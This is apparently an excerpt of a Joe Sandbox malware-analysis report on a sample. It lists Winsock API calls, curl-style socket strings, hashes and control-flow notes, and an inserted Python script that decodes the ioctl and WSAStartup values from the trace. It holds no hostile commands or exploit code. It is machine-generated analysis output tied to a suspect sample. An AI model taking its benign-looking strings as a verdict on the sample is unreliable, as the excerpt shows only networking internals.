                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0045ADAC
                                  • Bind to local port %d failed, trying next, xrefs: 0045AFE5
                                  • Trying [%s]:%d..., xrefs: 0045A689
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0045A796
                                  • bind failed with errno %d: %s, xrefs: 0045B080
                                  • @, xrefs: 0045A8F4
                                  • Trying %s:%d..., xrefs: 0045A7C2, 0045A7DE
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0045AE1F
                                  • Could not set TCP_NODELAY: %s, xrefs: 0045A871
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0045AD0A
                                  • Local port: %hu, xrefs: 0045AF28
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: 2d256e2aede60c84ad7b4357c1bb764d4cb6e22c46165f4a70eaf52d16caec30
                                  • Instruction ID: 73f2abd49fbb6dbdc6e4ca208c147ffcfe0e8af6552603ab81a181030fe41421
                                  • Opcode Fuzzy Hash: 2d256e2aede60c84ad7b4357c1bb764d4cb6e22c46165f4a70eaf52d16caec30
                                  • Instruction Fuzzy Hash: 28621471504340ABE7208F14C846BABB7E5BF85309F044A2EFD8897292E775E859CB97

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004E9946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004E9974
                                  • RegCloseKey.KERNELBASE(?), ref: 004E998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                  • API String ID: 3677997916-615551945
                                  • Opcode ID: 234b017d12c4959c87efe3de8e4a0207130dc5bc77404eff52c2aff2b2fd046e
                                  • Instruction ID: e62852bb0f05e3da326ee33acef307857a7749df418973aa7a87d7a9c5ddd7cb
                                  • Opcode Fuzzy Hash: 234b017d12c4959c87efe3de8e4a0207130dc5bc77404eff52c2aff2b2fd046e
                                  • Instruction Fuzzy Hash: 4632C6F1900241ABEB10AB27AC42A1B7694AF54319F08443BFD499B3A3F739ED14C75B

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00458C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00458CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: 07f4bb761a5dce50c473e04fd8097eb858dcce3d988df221f5f19350474681cd
                                  • Instruction ID: e635a5d7275e44dd19523f597202083f19d8197573ad6a6238960459b4d962c7
                                  • Opcode Fuzzy Hash: 07f4bb761a5dce50c473e04fd8097eb858dcce3d988df221f5f19350474681cd
                                  • Instruction Fuzzy Hash: 63B1AD70604705ABEB10CE24C885BA777A4AF45319F04852EEC59AB393DF78E85CCB66

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: 13ac59130680819926aa4cd29b5d2b3de8fe9fb0fd68c683a7d80e09571d565c
                                  • Instruction ID: af7fd95a67e6391596d51f2fc8710db3f342920ff3a24d93f2df9b1220bd504a
                                  • Opcode Fuzzy Hash: 13ac59130680819926aa4cd29b5d2b3de8fe9fb0fd68c683a7d80e09571d565c
                                  • Instruction Fuzzy Hash: 2371B3B49043199FDB10DF69D58479EBBF0FF84308F10896DE99897311E7749A888F92

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=B,00000000,?,?,004307BF), ref: 004276EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=B$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-2025329211
                                  • Opcode ID: 07de89ca14bf37dd5674ef1ed90f064c1ec086e0db6bd1910ffbd873dc2fb00b
                                  • Instruction ID: 2856db95599e25d87f3ae0fe2aa4b920d431f1220a9b1f59084952a9a3294f90
                                  • Opcode Fuzzy Hash: 07de89ca14bf37dd5674ef1ed90f064c1ec086e0db6bd1910ffbd873dc2fb00b
                                  • Instruction Fuzzy Hash: BB1104B1B1C3247BD110A759BD8AE2B7B5CDBC6B6CF840919B80453342E6669C008AB7

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0045935D
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00459389
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: c00d663447ef69122cf068f0e5d5dc3b68654232f4da6ca11a358f1111728e2e
                                  • Instruction ID: 7efa4600ac6160c336be36b1d2476dd3ab43e04f350f26f449d0bc337cb71845
                                  • Opcode Fuzzy Hash: c00d663447ef69122cf068f0e5d5dc3b68654232f4da6ca11a358f1111728e2e
                                  • Instruction Fuzzy Hash: 6651AE70A04305EBDB14DF24C881BAAB7A5EF89318F14852AFD488B382E734ED55C795

                                  Control-flow Graph (rendered graph not reproduced)
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: ac727cf1f57325512b6bf799a4e3b1dad96c43bb32c400515f597081c57a1890
                                  • Instruction ID: 12134daa455c7b320e5e93aa20d2f2b1b52c97b8c3839c210faf31599e6f4b21
                                  • Opcode Fuzzy Hash: ac727cf1f57325512b6bf799a4e3b1dad96c43bb32c400515f597081c57a1890
                                  • Instruction Fuzzy Hash: F81157B1F083647BD110AB18BC4EE27BB5CDBCAB2CF81051DB80453342DA25AC0089F7

                                  Control-flow Graph (graph image not reproduced; summary recovered from the graph data)
                                  • Function at 0x4275E0, basic blocks 0x4275E0-0x427699
                                  • Imported API called: socket (block 0x427607-0x427629)
                                  • Internal calls: 0x4272A0, 0x42CB20, 0x7A8C50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: 03ef6ba0bbdc5b7744f5a3e821c61eb9be3ea560ef16214b1850bfd27d30cfae
                                  • Instruction ID: bf3dbdb7828ef0d904a31d59b6b7a50ea17542e8cbfed3035546d37d02b00492
                                  • Opcode Fuzzy Hash: 03ef6ba0bbdc5b7744f5a3e821c61eb9be3ea560ef16214b1850bfd27d30cfae
                                  • Instruction Fuzzy Hash: 61115971B0476267D610566D7C4AF8B7B44DBC6738F844519F41093292D7168850CAE2

                                  Control-flow Graph (graph image not reproduced; summary recovered from the graph data)
                                  • Function at 0x7A8E90, basic blocks 0x7A8E90-0x7A8F5E, plus a second block cluster at 0x8DE980-0x8DEA42 reached from block 0x7A8ECB
                                  • Imported API called: _open (block 0x7A8E90-0x7A8EB8)
                                  • Internal calls: 0x7A9F70, 0x7A8D20, 0x7A8CA8, 0x7A8CC0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: _open
                                  • String ID: terminated$@
                                  • API String ID: 4183159743-3016906910
                                  • Opcode ID: f37ac5d5ecc254aa7c970d98903e97f3b3ccf0fba15a93a2de3328a9735f18f5
                                  • Instruction ID: afbb72d46db781589abb1418c62abb70421255ce80ec568b1a4ab8c1a3789370
                                  • Opcode Fuzzy Hash: f37ac5d5ecc254aa7c970d98903e97f3b3ccf0fba15a93a2de3328a9735f18f5
                                  • Instruction Fuzzy Hash: 07414CB0909305DECB50EF79C444A6EBBE4FB89314F408A2DE898D7381E738D905CB56

                                  Control-flow Graph (graph image not reproduced; summary recovered from the graph data)
                                  • Function at 0x45A150, basic blocks 0x45A150-0x45A250
                                  • Imported API called: getsockname (block 0x45A181-0x45A1CE)
                                  • Internal calls: 0x43D090, 0x45EF30, 0x464F40
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0045A1C7
                                  Strings
                                  • getsockname() failed with errno %d: %s, xrefs: 0045A1F0
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0045A23B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 265e211df504007b1f094a9b0c9618d595af669028f262d866140d5cef2e0ee4
                                  • Instruction ID: a9944d27c5ec4aea15d322b927364b66ed50a822e9699e2da9bf6dfbd03cbd0f
                                  • Opcode Fuzzy Hash: 265e211df504007b1f094a9b0c9618d595af669028f262d866140d5cef2e0ee4
                                  • Instruction Fuzzy Hash: 5F212831808280AAE7259B19EC47FE773BCEFD1328F000655FD8853152FA36599987E7

                                  Control-flow Graph (graph image not reproduced; summary recovered from the graph data)
                                  • Function at 0x43D5E0, basic blocks 0x43D5E0-0x43D68D
                                  • Imported API called: WSAStartup (block 0x43D652-0x43D662)
                                  • Internal calls: 0x43D690, 0x447620
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 0043D65B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: 853f9f10f64c5b25f43ec59d84c027e69dabd8623e70e28b12244563401dae6c
                                  • Instruction ID: b01336b1fb9a3779cc5f5d8fb9103affd8145c15b4ccb3e56720996dd3ef8639
                                  • Opcode Fuzzy Hash: 853f9f10f64c5b25f43ec59d84c027e69dabd8623e70e28b12244563401dae6c
                                  • Instruction Fuzzy Hash: 14012BD0D4034056F711BB38AD1BB6735D45F5D304F85246DE868923D2FB6CC598C257

                                  Control-flow Graph (graph image not reproduced; summary recovered from the graph data)
                                  • Function at 0x4EAA30, basic blocks 0x4EAA30-0x4EAF1F
                                  • Imported APIs called, in block order: socket (block 0x4EAB96-0x4EABAB), ioctlsocket (block 0x4EABD0-0x4EABED), connect (block 0x4EADA0-0x4EADB2)
                                  • Internal calls: 0x4DE730, 0x4DEA60, 0x4DEBF0, 0x4EAF70, 0x4DE760, 0x4DE7C0, 0x4DE180
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004EAB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004EABE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: ioctlsocketsocket
                                  • String ID:
                                  • API String ID: 416004797-0
                                  • Opcode ID: d8868d69830b5b1448c0694ad73a5fc4849b01a3cdc49b4465767a7d19db2bc2
                                  • Instruction ID: 5fa1b6adfc0c6a48014d0b37da137b1236d600a3234040517d37a60688c283cb
                                  • Opcode Fuzzy Hash: d8868d69830b5b1448c0694ad73a5fc4849b01a3cdc49b4465767a7d19db2bc2
                                  • Instruction Fuzzy Hash: 33E1E3706003819FEB20CF2AC885B6B77A5EF85305F144A2EF9988B391D779E854CB57
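                                  Added example (written for this page; not code from the Joe Sandbox report or from the sample): the raw argument values in the API entries above, in the WSAStartup entry (00000202) and in the following connect/WSAGetLastError record are only useful once decoded. The script parses the report's API lines, decodes the Winsock ioctl command code 8004667E into its _IOW('f', 126, u_long) components (that is FIONBIO), decodes the WSAStartup version word to 2.2, and checks the trace for the socket → ioctlsocket(FIONBIO, 1) → connect sequence that makes the connect non-blocking. The trace text is copied from the report's entries; the assumption that the entries are in call order follows the block order in the control-flow graph (socket at 0x4EAB96, ioctlsocket at 0x4EABD0, connect at 0x4EADA0), and the ioctl name table covers only a handful of codes from winsock2.h.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Layout of a Winsock ioctl command code (winsock2.h _IO / _IOR / _IOW macros):
#   bit 31     IOC_IN   (0x80000000)  parameter is copied in
#   bit 30     IOC_OUT  (0x40000000)  parameter is copied out
#   bit 29     IOC_VOID (0x20000000)  no parameter
#   bits 16-28 parameter size, masked with IOCPARM_MASK (0x7F)
#   bits 8-15  group character ('f' for FIO*, 's' for SIO*)
#   bits 0-7   command number
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOCPARM_MASK = 0x7F


def _ioc(direction: int, group: str, num: int, size: int) -> int:
    """Rebuild a command code the way the winsock2.h macros do."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# A few well-known codes, computed from the macro layout (u_long is 4 bytes).
FIONBIO = _ioc(IOC_IN, "f", 126, 4)        # 0x8004667E: set/clear non-blocking I/O
IOCTL_NAMES = {
    FIONBIO: "FIONBIO",
    _ioc(IOC_OUT, "f", 127, 4): "FIONREAD",   # bytes readable without blocking
    _ioc(IOC_IN, "f", 125, 4): "FIOASYNC",    # set/clear async I/O
    _ioc(IOC_OUT, "s", 7, 4): "SIOCATMARK",   # at OOB mark?
}

# Winsock error reported by WSAGetLastError while a non-blocking connect is in progress.
WSAEWOULDBLOCK = 10035


def decode_ioctl(code: int) -> dict:
    """Split a command code into direction flags, parameter size, group and number."""
    direction = [name for bit, name in ((IOC_IN, "IOC_IN"), (IOC_OUT, "IOC_OUT"),
                                        (IOC_VOID, "IOC_VOID")) if code & bit]
    return {
        "name": IOCTL_NAMES.get(code, "unknown"),
        "direction": direction,
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def decode_wsa_version(word: int) -> tuple:
    """WSAStartup takes MAKEWORD(major, minor): low byte major, high byte minor."""
    return (word & 0xFF, (word >> 8) & 0xFF)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed '?' (value not recovered)
    ref: int                    # address of the call site


# Report line shape: "• api.MODULE(arg,arg,...), ref: 004EAB9B"
LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_api_trace(text: str) -> List[ApiCall]:
    """Parse the API entries of a Joe Sandbox function record into ApiCall objects."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        api, module, raw_args, ref = m.groups()
        args = [None if a.strip() == "?" else int(a.strip(), 16)
                for a in raw_args.split(",") if a.strip()]
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


def is_nonblocking_connect(calls: List[ApiCall]) -> bool:
    """True when the trace shows socket(), then ioctlsocket(FIONBIO, non-zero), then connect()."""
    state = 0
    for c in calls:
        if state == 0 and c.api == "socket":
            state = 1
        elif (state == 1 and c.api == "ioctlsocket" and len(c.args) >= 3
              and c.args[1] == FIONBIO and c.args[2] not in (None, 0)):
            state = 2
        elif state == 2 and c.api == "connect":
            return True
    return False


# API entries copied from the report above; the argument lists are the sandbox's
# best-effort stack reconstruction, so the connect() arguments are not meaningful.
REPORT_TRACE = """\
• WSAStartup.WS2_32(00000202), ref: 0043D65B
• socket.WS2_32(FFFFFFFF,?,00000000), ref: 004EAB9B
• ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004EABE4
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004EB29E,?,00000000,?,?), ref: 004EB0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004D3C41,00000000), ref: 004EB0C1
"""

if __name__ == "__main__":
    calls = parse_api_trace(REPORT_TRACE)
    for c in calls:
        if c.api == "ioctlsocket":
            print(f"{c.api} @ {c.ref:08X}: {decode_ioctl(c.args[1])}")
        elif c.api == "WSAStartup":
            print(f"{c.api} @ {c.ref:08X}: version {decode_wsa_version(c.args[0])}")
    print("non-blocking connect sequence:", is_nonblocking_connect(calls))
```

                                  On a socket switched to non-blocking mode with FIONBIO, connect() returns SOCKET_ERROR immediately and WSAGetLastError() reports WSAEWOULDBLOCK (10035) while the handshake completes, which is why the report pairs connect with WSAGetLastError in the next record; the caller then waits for writability before using the socket.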
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 1ecf2a0a61407c7557508a778c2a2e9959d13fa8831ef28650740a942c0b3dc8
                                  • Instruction ID: a2786e19f892258576bfe26cea7230fc8cb6588abebf1182c1c25ced69cea3aa
                                  • Opcode Fuzzy Hash: 1ecf2a0a61407c7557508a778c2a2e9959d13fa8831ef28650740a942c0b3dc8
                                  • Instruction Fuzzy Hash: B7D05E32A09231AB862065AA7D49C4BBAA8DDCAF64B464899F944A7200D1209C0087F2
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004EB29E,?,00000000,?,?), ref: 004EB0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004D3C41,00000000), ref: 004EB0C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: 9027a41b7ecb6a7a0cbf21d858f584beb4d37f408f90fafeb53c479681d32e5a
                                  • Instruction ID: 8ffa9f3b35841093dc3ec3ac0a1c0fc136ce4014f47e972a531c7a0c4801955a
                                  • Opcode Fuzzy Hash: 9027a41b7ecb6a7a0cbf21d858f584beb4d37f408f90fafeb53c479681d32e5a
                                  • Instruction Fuzzy Hash: 5C01D8363042419BCA205A6A9C84EABB399FF89365F040766F978932D1D72AFD508792
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 004D4AA4
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: c9cb2befd2e9269be84bc9dbf71a0a5b4cc42f24064bdbe38c747635cb6f7183
                                  • Instruction ID: 2db35efb832d8ee8192e998a60c3cf2f5d7209f8620c952a23f87a54adb5baf7
                                  • Opcode Fuzzy Hash: c9cb2befd2e9269be84bc9dbf71a0a5b4cc42f24064bdbe38c747635cb6f7183
                                  • Instruction Fuzzy Hash: 8B51C3B06043008BEB309B36DD6972376D4AF91319F18197FE98A867D1E77DE844CB0A
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 004EAFD0
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 8f228aed5d2fde875a1ee54caaf6e10a736712b0ea6ca80f9e53527f15df5cd9
                                  • Instruction ID: fd68e72cf99ee93eb55acd94b0c7c459b79fe52326c7b6447d77c23f23892fe2
                                  • Opcode Fuzzy Hash: 8f228aed5d2fde875a1ee54caaf6e10a736712b0ea6ca80f9e53527f15df5cd9
                                  • Instruction Fuzzy Hash: F2116670808BC595EB268F1DD8027E7B3F4EFD0329F109619E59942150F7765AD68BC2
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004EA97E
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: ebb6f74840fcee20827377b5214427ff0c92d65de117008b69bb7e152ea5578f
                                  • Instruction ID: e6db311a282aa9023065106399abf2f6e4289ea1652084f9db5fed1638145623
                                  • Opcode Fuzzy Hash: ebb6f74840fcee20827377b5214427ff0c92d65de117008b69bb7e152ea5578f
                                  • Instruction Fuzzy Hash: 6201A7B17017109FC6148F15DC45B56B7A5EFC4721F0A8559F9941B361C331BC118BD2
                                  APIs
                                  • socket.WS2_32(?,004EB280,00000000,-00000001,00000000,004EB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004EAF66
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: b80d660657436b172d3573f5e80f4c67f6b8132ebf0c1a417e26e2e82fd82fee
                                  • Instruction ID: 5c618884293ffb2b5b6dd73b0b5a384e3ead653a70ce7e09d94999fac8c486ea
                                  • Opcode Fuzzy Hash: b80d660657436b172d3573f5e80f4c67f6b8132ebf0c1a417e26e2e82fd82fee
                                  • Instruction Fuzzy Hash: 24E0EDB2A052216BD6649B58E8449ABF3A9EFC8B21F054A4ABC5463304C730BC508BE2
                                  APIs
                                  • closesocket.WS2_32(?,004E9422,?,?,?,?,?,?,?,?,?,?,?,w3M,008E1280,00000000), ref: 004EB04D
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                  • Instruction ID: d1d776cd6e9b4a31205c5311b5bacdd952e0a746ecdc2c179033c6c182132d63
                                  • Opcode Fuzzy Hash: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                  • Instruction Fuzzy Hash: D7D0123470020157CA249A15C884A57766BBFD5711FA9CB68E42C8A655D73FEC478681
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,0045AF56,?,00000001), ref: 004867FC
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: ba23d06a8acd89c09260b1dca89f136b8bf8f131197afd38c0abbffe7c08a9d3
                                  • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                  • Opcode Fuzzy Hash: ba23d06a8acd89c09260b1dca89f136b8bf8f131197afd38c0abbffe7c08a9d3
                                  • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
                                  APIs
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: e029dbdac30af05245c5cd9efec1fb2988c41ddd549f1a5b40814f3510b03ed2
                                  • Instruction ID: edc745e35287df497e1877f9263039bcd9a15e4efa26945ec19797357e0f3f4f
